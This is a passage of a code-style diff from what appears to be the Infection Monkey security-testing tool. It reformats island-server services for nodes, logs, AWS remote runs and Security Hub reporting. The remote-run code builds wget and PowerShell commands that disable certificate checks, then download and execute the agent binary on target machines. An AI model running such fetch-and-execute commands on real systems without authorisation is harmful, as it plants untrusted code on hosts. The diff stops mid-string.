LogService.remove_logs_by_monkey_id(monkey_id) - file_id = database.gridfs.put(log_data, 
encoding='utf-8') + file_id = database.gridfs.put(log_data, encoding="utf-8") return mongo.db.log.insert( - { - 'monkey_id': monkey_id, - 'file_id': file_id, - 'timestamp': timestamp - } + {"monkey_id": monkey_id, "file_id": file_id, "timestamp": timestamp} ) @staticmethod def log_exists(monkey_id): - return mongo.db.log.find_one({'monkey_id': monkey_id}) is not None + return mongo.db.log.find_one({"monkey_id": monkey_id}) is not None diff --git a/monkey/monkey_island/cc/services/netmap/net_edge.py b/monkey/monkey_island/cc/services/netmap/net_edge.py index 0734bf606..008fa5b54 100644 --- a/monkey/monkey_island/cc/services/netmap/net_edge.py +++ b/monkey/monkey_island/cc/services/netmap/net_edge.py @@ -7,7 +7,6 @@ from monkey_island.cc.services.node import NodeService class NetEdgeService: - @staticmethod def get_all_net_edges(): edges = NetEdgeService._get_standard_net_edges() @@ -34,22 +33,29 @@ class NetEdgeService: island_id = ObjectId("000000000000000000000000") monkey_label = NodeService.get_label_for_endpoint(monkey_id) island_label = NodeService.get_label_for_endpoint(island_id) - island_pseudo_edge = DisplayedEdgeService.generate_pseudo_edge(edge_id=fake_id, - src_node_id=monkey_id, - dst_node_id=island_id, - src_label=monkey_label, - dst_label=island_label) + island_pseudo_edge = DisplayedEdgeService.generate_pseudo_edge( + edge_id=fake_id, + src_node_id=monkey_id, + dst_node_id=island_id, + src_label=monkey_label, + dst_label=island_label, + ) edges.append(island_pseudo_edge) return edges @staticmethod def _get_infected_island_net_edges(monkey_island_monkey): - existing_ids = [x.src_node_id for x - in EdgeService.get_by_dst_node(dst_node_id=monkey_island_monkey["_id"])] - monkey_ids = [x.id for x in Monkey.objects() - if ("tunnel" not in x) and - (x.id not in existing_ids) and - (x.id != monkey_island_monkey["_id"])] + existing_ids = [ + x.src_node_id + for x in EdgeService.get_by_dst_node(dst_node_id=monkey_island_monkey["_id"]) + ] + monkey_ids = [ + x.id + for x in Monkey.objects() + if ("tunnel" not in x) + and (x.id not in existing_ids) + and (x.id != monkey_island_monkey["_id"]) + ] edges = [] count = 0 @@ -59,11 +65,13 @@ class NetEdgeService: fake_id = ObjectId(hex(count)[2:].zfill(24)) src_label = NodeService.get_label_for_endpoint(monkey_id) dst_label = NodeService.get_label_for_endpoint(monkey_island_monkey["_id"]) - edge = DisplayedEdgeService.generate_pseudo_edge(edge_id=fake_id, - src_node_id=monkey_id, - dst_node_id=monkey_island_monkey["_id"], - src_label=src_label, - dst_label=dst_label) + edge = DisplayedEdgeService.generate_pseudo_edge( + edge_id=fake_id, + src_node_id=monkey_id, + dst_node_id=monkey_island_monkey["_id"], + src_label=src_label, + dst_label=dst_label, + ) edges.append(edge) return edges diff --git a/monkey/monkey_island/cc/services/netmap/net_node.py b/monkey/monkey_island/cc/services/netmap/net_node.py index 796167cf5..6bb54fd40 100644 --- a/monkey/monkey_island/cc/services/netmap/net_node.py +++ b/monkey/monkey_island/cc/services/netmap/net_node.py @@ -3,7 +3,6 @@ from monkey_island.cc.services.node import NodeService class NetNodeService: - @staticmethod def get_all_net_nodes(): monkeys = NetNodeService._get_monkey_net_nodes() diff --git a/monkey/monkey_island/cc/services/node.py b/monkey/monkey_island/cc/services/node.py index 1c2c0f9f1..5bfb60776 100644 --- a/monkey/monkey_island/cc/services/node.py +++ b/monkey/monkey_island/cc/services/node.py @@ -36,7 +36,7 @@ class NodeService: # node is infected new_node = 
NodeService.monkey_to_net_node(monkey, for_report) for key in monkey: - if key not in ['_id', 'modifytime', 'parent', 'dead', 'description']: + if key not in ["_id", "modifytime", "parent", "dead", "description"]: new_node[key] = monkey[key] else: @@ -52,18 +52,18 @@ class NodeService: edges = DisplayedEdgeService.get_displayed_edges_by_dst(node_id, for_report) for edge in edges: - from_node_id = edge['from'] + from_node_id = edge["from"] from_node_label = Monkey.get_label_by_id(from_node_id) from_node_hostname = Monkey.get_hostname_by_id(from_node_id) accessible_from_nodes.append(from_node_label) accessible_from_nodes_hostnames.append(from_node_hostname) - for edge_exploit in edge['exploits']: - edge_exploit['origin'] = from_node_label + for edge_exploit in edge["exploits"]: + edge_exploit["origin"] = from_node_label exploits.append(edge_exploit) - exploits = sorted(exploits, key=lambda exploit: exploit['timestamp']) + exploits = sorted(exploits, key=lambda exploit: exploit["timestamp"]) new_node["exploits"] = exploits new_node["accessible_from_nodes"] = accessible_from_nodes @@ -73,7 +73,7 @@ class NodeService: else: new_node["services"] = [] - new_node['has_log'] = monkey_island.cc.services.log.LogService.log_exists(ObjectId(node_id)) + new_node["has_log"] = monkey_island.cc.services.log.LogService.log_exists(ObjectId(node_id)) return new_node @staticmethod @@ -110,8 +110,9 @@ class NodeService: @staticmethod def get_monkey_critical_services(monkey_id): - critical_services = mongo.db.monkey.find_one({'_id': monkey_id}, {'critical_services': 1}).get( - 'critical_services', []) + critical_services = mongo.db.monkey.find_one( + {"_id": monkey_id}, {"critical_services": 1} + ).get("critical_services", []) return critical_services @staticmethod @@ -139,8 +140,8 @@ class NodeService: @staticmethod def get_node_group(node) -> str: - if 'group' in node and node['group']: - return node['group'] + if "group" in node and node["group"]: + return node["group"] node_type = "exploited" if node.get("exploited") else "clean" node_os = NodeService.get_node_os(node) return NodeStates.get_by_keywords([node_type, node_os]).value @@ -148,44 +149,41 @@ class NodeService: @staticmethod def monkey_to_net_node(monkey, for_report=False): monkey_id = monkey["_id"] - label = Monkey.get_hostname_by_id(monkey_id) if for_report else Monkey.get_label_by_id(monkey_id) + label = ( + Monkey.get_hostname_by_id(monkey_id) + if for_report + else Monkey.get_label_by_id(monkey_id) + ) monkey_group = NodeService.get_monkey_group(monkey) - return \ - { - "id": monkey_id, - "label": label, - "group": monkey_group, - "os": NodeService.get_monkey_os(monkey), - # The monkey is running IFF the group contains "_running". Therefore it's dead IFF the group does NOT - # contain "_running". This is a small optimisation, to not call "is_dead" twice. - "dead": "_running" not in monkey_group, - "domain_name": "", - "pba_results": monkey["pba_results"] if "pba_results" in monkey else [] - } + return { + "id": monkey_id, + "label": label, + "group": monkey_group, + "os": NodeService.get_monkey_os(monkey), + # The monkey is running IFF the group contains "_running". Therefore it's dead IFF the group does NOT + # contain "_running". This is a small optimisation, to not call "is_dead" twice. 
+ "dead": "_running" not in monkey_group, + "domain_name": "", + "pba_results": monkey["pba_results"] if "pba_results" in monkey else [], + } @staticmethod def node_to_net_node(node, for_report=False): - label = node['os']['version'] if for_report else NodeService.get_node_label(node) - return \ - { - "id": node["_id"], - "label": label, - "group": NodeService.get_node_group(node), - "os": NodeService.get_node_os(node) - } + label = node["os"]["version"] if for_report else NodeService.get_node_label(node) + return { + "id": node["_id"], + "label": label, + "group": NodeService.get_node_group(node), + "os": NodeService.get_node_os(node), + } @staticmethod def set_node_group(node_id: str, node_group: NodeStates): - mongo.db.node.update({"_id": node_id}, - {'$set': {'group': node_group.value}}, - upsert=False) + mongo.db.node.update({"_id": node_id}, {"$set": {"group": node_group.value}}, upsert=False) @staticmethod def unset_all_monkey_tunnels(monkey_id): - mongo.db.monkey.update( - {"_id": monkey_id}, - {'$unset': {'tunnel': ''}}, - upsert=False) + mongo.db.monkey.update({"_id": monkey_id}, {"$unset": {"tunnel": ""}}, upsert=False) edges = EdgeService.get_tunnel_edges_by_src(monkey_id) for edge in edges: @@ -196,84 +194,88 @@ class NodeService: tunnel_host_id = NodeService.get_monkey_by_ip(tunnel_host_ip)["_id"] NodeService.unset_all_monkey_tunnels(monkey_id) mongo.db.monkey.update( - {'_id': monkey_id}, - {'$set': {'tunnel': tunnel_host_id}}, - upsert=False) + {"_id": monkey_id}, {"$set": {"tunnel": tunnel_host_id}}, upsert=False + ) monkey_label = NodeService.get_label_for_endpoint(monkey_id) tunnel_host_label = NodeService.get_label_for_endpoint(tunnel_host_id) - tunnel_edge = EdgeService.get_or_create_edge(src_node_id=monkey_id, - dst_node_id=tunnel_host_id, - src_label=monkey_label, - dst_label=tunnel_host_label) + tunnel_edge = EdgeService.get_or_create_edge( + src_node_id=monkey_id, + dst_node_id=tunnel_host_id, + src_label=monkey_label, + dst_label=tunnel_host_label, + ) tunnel_edge.tunnel = True tunnel_edge.ip_address = tunnel_host_ip tunnel_edge.save() @staticmethod - def insert_node(ip_address, domain_name=''): + def insert_node(ip_address, domain_name=""): new_node_insert_result = mongo.db.node.insert_one( { "ip_addresses": [ip_address], "domain_name": domain_name, "exploited": False, "creds": [], - "os": - { - "type": "unknown", - "version": "unknown" - } - }) + "os": {"type": "unknown", "version": "unknown"}, + } + ) return mongo.db.node.find_one({"_id": new_node_insert_result.inserted_id}) @staticmethod def create_node_from_bootloader_telem(bootloader_telem: Dict, will_monkey_run: bool): new_node_insert_result = mongo.db.node.insert_one( { - "ip_addresses": bootloader_telem['ips'], - "domain_name": bootloader_telem['hostname'], + "ip_addresses": bootloader_telem["ips"], + "domain_name": bootloader_telem["hostname"], "will_monkey_run": will_monkey_run, "exploited": False, "creds": [], - "os": - { - "type": bootloader_telem['system'], - "version": bootloader_telem['os_version'] - } - }) + "os": { + "type": bootloader_telem["system"], + "version": bootloader_telem["os_version"], + }, + } + ) return mongo.db.node.find_one({"_id": new_node_insert_result.inserted_id}) @staticmethod - def get_or_create_node_from_bootloader_telem(bootloader_telem: Dict, will_monkey_run: bool) -> Dict: - if is_local_ips(bootloader_telem['ips']): + def get_or_create_node_from_bootloader_telem( + bootloader_telem: Dict, will_monkey_run: bool + ) -> Dict: + if is_local_ips(bootloader_telem["ips"]): raise 
NodeCreationException("Bootloader ran on island, no need to create new node.") - new_node = mongo.db.node.find_one({"ip_addresses": {"$in": bootloader_telem['ips']}}) + new_node = mongo.db.node.find_one({"ip_addresses": {"$in": bootloader_telem["ips"]}}) # Temporary workaround to not create a node after monkey finishes - monkey_node = mongo.db.monkey.find_one({"ip_addresses": {"$in": bootloader_telem['ips']}}) + monkey_node = mongo.db.monkey.find_one({"ip_addresses": {"$in": bootloader_telem["ips"]}}) if monkey_node: # Don't create new node, monkey node is already present return monkey_node if new_node is None: - new_node = NodeService.create_node_from_bootloader_telem(bootloader_telem, will_monkey_run) - if bootloader_telem['tunnel']: - dst_node = NodeService.get_node_or_monkey_by_ip(bootloader_telem['tunnel']) + new_node = NodeService.create_node_from_bootloader_telem( + bootloader_telem, will_monkey_run + ) + if bootloader_telem["tunnel"]: + dst_node = NodeService.get_node_or_monkey_by_ip(bootloader_telem["tunnel"]) else: dst_node = NodeService.get_monkey_island_node() - src_label = NodeService.get_label_for_endpoint(new_node['_id']) - dst_label = NodeService.get_label_for_endpoint(dst_node['id']) - edge = EdgeService.get_or_create_edge(src_node_id=new_node['_id'], - dst_node_id=dst_node['id'], - src_label=src_label, - dst_label=dst_label) - edge.tunnel = bool(bootloader_telem['tunnel']) - edge.ip_address = bootloader_telem['ips'][0] - edge.group = NodeStates.get_by_keywords(['island']).value + src_label = NodeService.get_label_for_endpoint(new_node["_id"]) + dst_label = NodeService.get_label_for_endpoint(dst_node["id"]) + edge = EdgeService.get_or_create_edge( + src_node_id=new_node["_id"], + dst_node_id=dst_node["id"], + src_label=src_label, + dst_label=dst_label, + ) + edge.tunnel = bool(bootloader_telem["tunnel"]) + edge.ip_address = bootloader_telem["ips"][0] + edge.group = NodeStates.get_by_keywords(["island"]).value edge.save() return new_node @staticmethod - def get_or_create_node(ip_address, domain_name=''): + def get_or_create_node(ip_address, domain_name=""): new_node = mongo.db.node.find_one({"ip_addresses": ip_address}) if new_node is None: new_node = NodeService.insert_node(ip_address, domain_name) @@ -301,27 +303,25 @@ class NodeService: @staticmethod def update_monkey_modify_time(monkey_id): - mongo.db.monkey.update({"_id": monkey_id}, - {"$set": {"modifytime": datetime.now()}}, - upsert=False) + mongo.db.monkey.update( + {"_id": monkey_id}, {"$set": {"modifytime": datetime.now()}}, upsert=False + ) @staticmethod def set_monkey_dead(monkey, is_dead): - props_to_set = {'dead': is_dead} + props_to_set = {"dead": is_dead} # Cancel the force kill once monkey died if is_dead: - props_to_set['config.alive'] = True + props_to_set["config.alive"] = True - mongo.db.monkey.update({"guid": monkey['guid']}, - {'$set': props_to_set}, - upsert=False) + mongo.db.monkey.update({"guid": monkey["guid"]}, {"$set": props_to_set}, upsert=False) @staticmethod def add_communication_info(monkey, info): - mongo.db.monkey.update({"guid": monkey["guid"]}, - {"$set": {'command_control_channel': info}}, - upsert=False) + mongo.db.monkey.update( + {"guid": monkey["guid"]}, {"$set": {"command_control_channel": info}}, upsert=False + ) @staticmethod def get_monkey_island_monkey(): @@ -338,12 +338,11 @@ class NodeService: @staticmethod def get_monkey_island_pseudo_net_node(): - return \ - { - "id": NodeService.get_monkey_island_pseudo_id(), - "label": "MonkeyIsland", - "group": "island", - } + return { 
+ "id": NodeService.get_monkey_island_pseudo_id(), + "label": "MonkeyIsland", + "group": "island", + } @staticmethod def get_monkey_island_node(): @@ -354,22 +353,23 @@ class NodeService: @staticmethod def set_node_exploited(node_id): - mongo.db.node.update( - {"_id": node_id}, - {"$set": {"exploited": True}} - ) + mongo.db.node.update({"_id": node_id}, {"$set": {"exploited": True}}) @staticmethod def update_dead_monkeys(): # Update dead monkeys only if no living monkey transmitted keepalive in the last 10 minutes if mongo.db.monkey.find_one( - {'dead': {'$ne': True}, 'keepalive': {'$gte': datetime.now() - timedelta(minutes=10)}}): + {"dead": {"$ne": True}, "keepalive": {"$gte": datetime.now() - timedelta(minutes=10)}} + ): return # config.alive is changed to true to cancel the force kill of dead monkeys mongo.db.monkey.update( - {'keepalive': {'$lte': datetime.now() - timedelta(minutes=10)}, 'dead': {'$ne': True}}, - {'$set': {'dead': True, 'config.alive': True, 'modifytime': datetime.now()}}, upsert=False, multi=True) + {"keepalive": {"$lte": datetime.now() - timedelta(minutes=10)}, "dead": {"$ne": True}}, + {"$set": {"dead": True, "config.alive": True, "modifytime": datetime.now()}}, + upsert=False, + multi=True, + ) @staticmethod def is_any_monkey_alive(): @@ -386,17 +386,11 @@ class NodeService: @staticmethod def add_credentials_to_monkey(monkey_id, creds): - mongo.db.monkey.update( - {'_id': monkey_id}, - {'$push': {'creds': creds}} - ) + mongo.db.monkey.update({"_id": monkey_id}, {"$push": {"creds": creds}}) @staticmethod def add_credentials_to_node(node_id, creds): - mongo.db.node.update( - {'_id': node_id}, - {'$push': {'creds': creds}} - ) + mongo.db.node.update({"_id": node_id}, {"$push": {"creds": creds}}) @staticmethod def get_node_or_monkey_by_ip(ip_address): @@ -414,16 +408,18 @@ class NodeService: @staticmethod def get_node_hostname(node): - return node['hostname'] if 'hostname' in node else node['os']['version'] + return node["hostname"] if "hostname" in node else node["os"]["version"] @staticmethod def get_hostname_by_id(node_id): - return NodeService.get_node_hostname(mongo.db.monkey.find_one({'_id': node_id}, {'hostname': 1})) + return NodeService.get_node_hostname( + mongo.db.monkey.find_one({"_id": node_id}, {"hostname": 1}) + ) @staticmethod def get_label_for_endpoint(endpoint_id): if endpoint_id == ObjectId("000000000000000000000000"): - return 'MonkeyIsland' + return "MonkeyIsland" if Monkey.is_monkey(endpoint_id): return Monkey.get_label_by_id(endpoint_id) else: diff --git a/monkey/monkey_island/cc/services/post_breach_files.py b/monkey/monkey_island/cc/services/post_breach_files.py index 44f1b91b2..4215227ea 100644 --- a/monkey/monkey_island/cc/services/post_breach_files.py +++ b/monkey/monkey_island/cc/services/post_breach_files.py @@ -11,18 +11,22 @@ from monkey_island.cc.server_utils.consts import MONKEY_ISLAND_ABS_PATH logger = logging.getLogger(__name__) # Where to find file names in config -PBA_WINDOWS_FILENAME_PATH = ['monkey', 'post_breach', 'PBA_windows_filename'] -PBA_LINUX_FILENAME_PATH = ['monkey', 'post_breach', 'PBA_linux_filename'] -UPLOADS_DIR_NAME = 'userUploads' +PBA_WINDOWS_FILENAME_PATH = ["monkey", "post_breach", "PBA_windows_filename"] +PBA_LINUX_FILENAME_PATH = ["monkey", "post_breach", "PBA_linux_filename"] +UPLOADS_DIR_NAME = "userUploads" -ABS_UPLOAD_PATH = Path(MONKEY_ISLAND_ABS_PATH, 'cc', UPLOADS_DIR_NAME) +ABS_UPLOAD_PATH = Path(MONKEY_ISLAND_ABS_PATH, "cc", UPLOADS_DIR_NAME) def remove_PBA_files(): if 
monkey_island.cc.services.config.ConfigService.get_config(): - windows_filename = monkey_island.cc.services.config.ConfigService.get_config_value(PBA_WINDOWS_FILENAME_PATH) - linux_filename = monkey_island.cc.services.config.ConfigService.get_config_value(PBA_LINUX_FILENAME_PATH) + windows_filename = monkey_island.cc.services.config.ConfigService.get_config_value( + PBA_WINDOWS_FILENAME_PATH + ) + linux_filename = monkey_island.cc.services.config.ConfigService.get_config_value( + PBA_LINUX_FILENAME_PATH + ) if linux_filename: remove_file(linux_filename) if windows_filename: @@ -44,7 +48,11 @@ def set_config_PBA_files(config_json): :param config_json: config_json that will be modified """ if monkey_island.cc.services.config.ConfigService.get_config(): - linux_filename = monkey_island.cc.services.config.ConfigService.get_config_value(PBA_LINUX_FILENAME_PATH) - windows_filename = monkey_island.cc.services.config.ConfigService.get_config_value(PBA_WINDOWS_FILENAME_PATH) - config_json['monkey']['post_breach']['PBA_linux_filename'] = linux_filename - config_json['monkey']['post_breach']['PBA_windows_filename'] = windows_filename + linux_filename = monkey_island.cc.services.config.ConfigService.get_config_value( + PBA_LINUX_FILENAME_PATH + ) + windows_filename = monkey_island.cc.services.config.ConfigService.get_config_value( + PBA_WINDOWS_FILENAME_PATH + ) + config_json["monkey"]["post_breach"]["PBA_linux_filename"] = linux_filename + config_json["monkey"]["post_breach"]["PBA_windows_filename"] = windows_filename diff --git a/monkey/monkey_island/cc/services/remote_run_aws.py b/monkey/monkey_island/cc/services/remote_run_aws.py index dfaa0e327..e640110e0 100644 --- a/monkey/monkey_island/cc/services/remote_run_aws.py +++ b/monkey/monkey_island/cc/services/remote_run_aws.py @@ -48,9 +48,13 @@ class RemoteRunAwsService: return CmdRunner.run_multiple_commands( instances, lambda instance: RemoteRunAwsService.run_aws_monkey_cmd_async( - instance['instance_id'], RemoteRunAwsService._is_linux(instance['os']), island_ip, - instances_bitness[instance['instance_id']]), - lambda _, result: result.is_success) + instance["instance_id"], + RemoteRunAwsService._is_linux(instance["os"]), + island_ip, + instances_bitness[instance["instance_id"]], + ), + lambda _, result: result.is_success, + ) @staticmethod def is_running_on_aws(): @@ -73,18 +77,23 @@ class RemoteRunAwsService: return CmdRunner.run_multiple_commands( instances, lambda instance: RemoteRunAwsService.run_aws_bitness_cmd_async( - instance['instance_id'], RemoteRunAwsService._is_linux(instance['os'])), + instance["instance_id"], RemoteRunAwsService._is_linux(instance["os"]) + ), lambda instance, result: RemoteRunAwsService._get_bitness_by_result( - RemoteRunAwsService._is_linux(instance['os']), result)) + RemoteRunAwsService._is_linux(instance["os"]), result + ), + ) @staticmethod def _get_bitness_by_result(is_linux, result): if not result.is_success: return None elif is_linux: - return result.stdout.find('i686') == -1 # i686 means 32bit + return result.stdout.find("i686") == -1 # i686 means 32bit else: - return result.stdout.lower().find('programfiles(x86)') != -1 # if not found it means 32bit + return ( + result.stdout.lower().find("programfiles(x86)") != -1 + ) # if not found it means 32bit @staticmethod def run_aws_bitness_cmd_async(instance_id, is_linux): @@ -94,7 +103,7 @@ class RemoteRunAwsService: :param is_linux: Whether target is linux :return: Cmd """ - cmd_text = 'uname -m' if is_linux else 'Get-ChildItem Env:' + cmd_text = "uname -m" if 
is_linux else "Get-ChildItem Env:" return RemoteRunAwsService.run_aws_cmd_async(instance_id, is_linux, cmd_text) @staticmethod @@ -117,24 +126,42 @@ class RemoteRunAwsService: @staticmethod def _is_linux(os): - return 'linux' == os + return "linux" == os @staticmethod def _get_run_monkey_cmd_linux_line(bit_text, island_ip): - return r'wget --no-check-certificate https://' + island_ip + r':5000/api/monkey/download/monkey-linux-' + \ - bit_text + r'; chmod +x monkey-linux-' + bit_text + r'; ./monkey-linux-' + bit_text + r' m0nk3y -s ' + \ - island_ip + r':5000' + return ( + r"wget --no-check-certificate https://" + + island_ip + + r":5000/api/monkey/download/monkey-linux-" + + bit_text + + r"; chmod +x monkey-linux-" + + bit_text + + r"; ./monkey-linux-" + + bit_text + + r" m0nk3y -s " + + island_ip + + r":5000" + ) @staticmethod def _get_run_monkey_cmd_windows_line(bit_text, island_ip): - return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \ - r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \ - r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \ - r";Start-Process -FilePath '.\\monkey.exe' " \ - r"-ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " + return ( + r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" + r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + + island_ip + + r":5000/api/monkey/download/monkey-windows-" + + bit_text + + r".exe','.\\monkey.exe'); " + r";Start-Process -FilePath '.\\monkey.exe' " + r"-ArgumentList 'm0nk3y -s " + island_ip + r":5000'; " + ) @staticmethod def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip): - bit_text = '64' if is_64bit else '32' - return RemoteRunAwsService._get_run_monkey_cmd_linux_line(bit_text, island_ip) if is_linux \ + bit_text = "64" if is_64bit else "32" + return ( + RemoteRunAwsService._get_run_monkey_cmd_linux_line(bit_text, island_ip) + if is_linux else RemoteRunAwsService._get_run_monkey_cmd_windows_line(bit_text, island_ip) + ) diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index 1347775d0..1505b63aa 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -8,7 +8,7 @@ from botocore.exceptions import UnknownServiceError from common.cloud.aws.aws_instance import AwsInstance from monkey_island.cc.services.reporting.exporter import Exporter -__authors__ = ['maor.rayzin', 'shay.nehmad'] +__authors__ = ["maor.rayzin", "shay.nehmad"] logger = logging.getLogger(__name__) @@ -20,9 +20,9 @@ class AWSExporter(Exporter): def handle_report(report_json): findings_list = [] - issues_list = report_json['recommendations']['issues'] + issues_list = report_json["recommendations"]["issues"] if not issues_list: - logger.info('No issues were found by the monkey, no need to send anything') + logger.info("No issues were found by the monkey, no need to send anything") return True # Not suppressing error here on purpose. 
@@ -30,11 +30,11 @@ class AWSExporter(Exporter): for machine in issues_list: for issue in issues_list[machine]: - if issue.get('aws_instance_id', None): + if issue.get("aws_instance_id", None): findings_list.append(AWSExporter._prepare_finding(issue, current_aws_region)) if not AWSExporter._send_findings(findings_list, current_aws_region): - logger.error('Exporting findings to aws failed') + logger.error("Exporting findings to aws failed") return False return True @@ -48,30 +48,32 @@ class AWSExporter(Exporter): @staticmethod def _prepare_finding(issue, region): findings_dict = { - 'island_cross_segment': AWSExporter._handle_island_cross_segment_issue, - 'ssh': AWSExporter._handle_ssh_issue, - 'shellshock': AWSExporter._handle_shellshock_issue, - 'tunnel': AWSExporter._handle_tunnel_issue, - 'elastic': AWSExporter._handle_elastic_issue, - 'smb_password': AWSExporter._handle_smb_password_issue, - 'smb_pth': AWSExporter._handle_smb_pth_issue, - 'sambacry': AWSExporter._handle_sambacry_issue, - 'shared_passwords': AWSExporter._handle_shared_passwords_issue, - 'wmi_password': AWSExporter._handle_wmi_password_issue, - 'wmi_pth': AWSExporter._handle_wmi_pth_issue, - 'ssh_key': AWSExporter._handle_ssh_key_issue, - 'shared_passwords_domain': AWSExporter._handle_shared_passwords_domain_issue, - 'shared_admins_domain': AWSExporter._handle_shared_admins_domain_issue, - 'strong_users_on_crit': AWSExporter._handle_strong_users_on_crit_issue, - 'struts2': AWSExporter._handle_struts2_issue, - 'weblogic': AWSExporter._handle_weblogic_issue, - 'hadoop': AWSExporter._handle_hadoop_issue, + "island_cross_segment": AWSExporter._handle_island_cross_segment_issue, + "ssh": AWSExporter._handle_ssh_issue, + "shellshock": AWSExporter._handle_shellshock_issue, + "tunnel": AWSExporter._handle_tunnel_issue, + "elastic": AWSExporter._handle_elastic_issue, + "smb_password": AWSExporter._handle_smb_password_issue, + "smb_pth": AWSExporter._handle_smb_pth_issue, + "sambacry": AWSExporter._handle_sambacry_issue, + "shared_passwords": AWSExporter._handle_shared_passwords_issue, + "wmi_password": AWSExporter._handle_wmi_password_issue, + "wmi_pth": AWSExporter._handle_wmi_pth_issue, + "ssh_key": AWSExporter._handle_ssh_key_issue, + "shared_passwords_domain": AWSExporter._handle_shared_passwords_domain_issue, + "shared_admins_domain": AWSExporter._handle_shared_admins_domain_issue, + "strong_users_on_crit": AWSExporter._handle_strong_users_on_crit_issue, + "struts2": AWSExporter._handle_struts2_issue, + "weblogic": AWSExporter._handle_weblogic_issue, + "hadoop": AWSExporter._handle_hadoop_issue, # azure and conficker are not relevant issues for an AWS env } configured_product_arn = INFECTION_MONKEY_ARN - product_arn = 'arn:aws:securityhub:{region}:{arn}'.format(region=region, arn=configured_product_arn) - instance_arn = 'arn:aws:ec2:' + str(region) + ':instance:{instance_id}' + product_arn = "arn:aws:securityhub:{region}:{arn}".format( + region=region, arn=configured_product_arn + ) + instance_arn = "arn:aws:ec2:" + str(region) + ":instance:{instance_id}" # Not suppressing error here on purpose. 
account_id = AwsInstance().get_account_id() logger.debug("aws account id acquired: {}".format(account_id)) @@ -80,22 +82,22 @@ class AWSExporter(Exporter): "SchemaVersion": "2018-10-08", "Id": uuid.uuid4().hex, "ProductArn": product_arn, - "GeneratorId": issue['type'], + "GeneratorId": issue["type"], "AwsAccountId": account_id, "RecordState": "ACTIVE", - "Types": [ - "Software and Configuration Checks/Vulnerabilities/CVE" - ], - "CreatedAt": datetime.now().isoformat() + 'Z', - "UpdatedAt": datetime.now().isoformat() + 'Z', + "Types": ["Software and Configuration Checks/Vulnerabilities/CVE"], + "CreatedAt": datetime.now().isoformat() + "Z", + "UpdatedAt": datetime.now().isoformat() + "Z", } - return AWSExporter.merge_two_dicts(finding, findings_dict[issue['type']](issue, instance_arn)) + return AWSExporter.merge_two_dicts( + finding, findings_dict[issue["type"]](issue, instance_arn) + ) @staticmethod def _send_findings(findings_list, region): try: logger.debug("Trying to acquire securityhub boto3 client in " + region) - security_hub_client = boto3.client('securityhub', region_name=region) + security_hub_client = boto3.client("securityhub", region_name=region) logger.debug("Client acquired: {0}".format(repr(security_hub_client))) # Assumes the machine has the correct IAM role to do this, @see @@ -103,42 +105,39 @@ class AWSExporter(Exporter): import_response = security_hub_client.batch_import_findings(Findings=findings_list) logger.debug("Import findings response: {0}".format(repr(import_response))) - if import_response['ResponseMetadata']['HTTPStatusCode'] == 200: + if import_response["ResponseMetadata"]["HTTPStatusCode"] == 200: return True else: return False except UnknownServiceError as e: - logger.warning('AWS exporter called but AWS-CLI security hub service is not installed. Error: {}'.format(e)) + logger.warning( + "AWS exporter called but AWS-CLI security hub service is not installed. Error: {}".format( + e + ) + ) return False except Exception as e: - logger.exception('AWS security hub findings failed to send. Error: {}'.format(e)) + logger.exception("AWS security hub findings failed to send. Error: {}".format(e)) return False @staticmethod def _get_finding_resource(instance_id, instance_arn): if instance_id: - return [{ - "Type": "AwsEc2Instance", - "Id": instance_arn.format(instance_id=instance_id) - }] + return [{"Type": "AwsEc2Instance", "Id": instance_arn.format(instance_id=instance_id)}] else: - return [{'Type': 'Other', 'Id': 'None'}] + return [{"Type": "Other", "Id": "None"}] @staticmethod - def _build_generic_finding(severity, title, description, recommendation, instance_arn, instance_id=None): + def _build_generic_finding( + severity, title, description, recommendation, instance_arn, instance_id=None + ): finding = { - "Severity": { - "Product": severity, - "Normalized": 100 - }, - 'Resources': AWSExporter._get_finding_resource(instance_id, instance_arn), + "Severity": {"Product": severity, "Normalized": 100}, + "Resources": AWSExporter._get_finding_resource(instance_id, instance_arn), "Title": title, "Description": description, - "Remediation": { - "Recommendation": { - "Text": recommendation - } - }} + "Remediation": {"Recommendation": {"Text": recommendation}}, + } return finding @@ -150,9 +149,9 @@ class AWSExporter(Exporter): title="Weak segmentation - Machines were able to communicate over unused ports.", description="Use micro-segmentation policies to disable communication other than the required.", recommendation="Machines are not locked down at port level. 
" - "Network tunnel was set up from {0} to {1}".format(issue['machine'], issue['dest']), + "Network tunnel was set up from {0} to {1}".format(issue["machine"], issue["dest"]), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -162,13 +161,13 @@ class AWSExporter(Exporter): severity=10, title="Samba servers are vulnerable to 'SambaCry'", description="Change {0} password to a complex one-use password that is not shared with other computers on the " - "network. Update your Samba server to 4.4.14 and up, " - "4.5.10 and up, or 4.6.4 and up.".format(issue['username']), + "network. Update your Samba server to 4.4.14 and up, " + "4.5.10 and up, or 4.6.4 and up.".format(issue["username"]), recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB " - "protocol with user {2} and its password, and used the SambaCry " - "vulnerability.".format(issue['machine'], issue['ip_address'], issue['username']), + "protocol with user {2} and its password, and used the SambaCry " + "vulnerability.".format(issue["machine"], issue["ip_address"], issue["username"]), instance_arn=instance_arn, - instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None + instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) @staticmethod @@ -178,11 +177,13 @@ class AWSExporter(Exporter): severity=5, title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.", description="Change {0}'s password to a complex one-use password that is not shared with other computers on the " - "network.".format(issue['username']), + "network.".format(issue["username"]), recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over " - "SMB protocol with user {2}.".format(issue['machine'], issue['ip_address'], 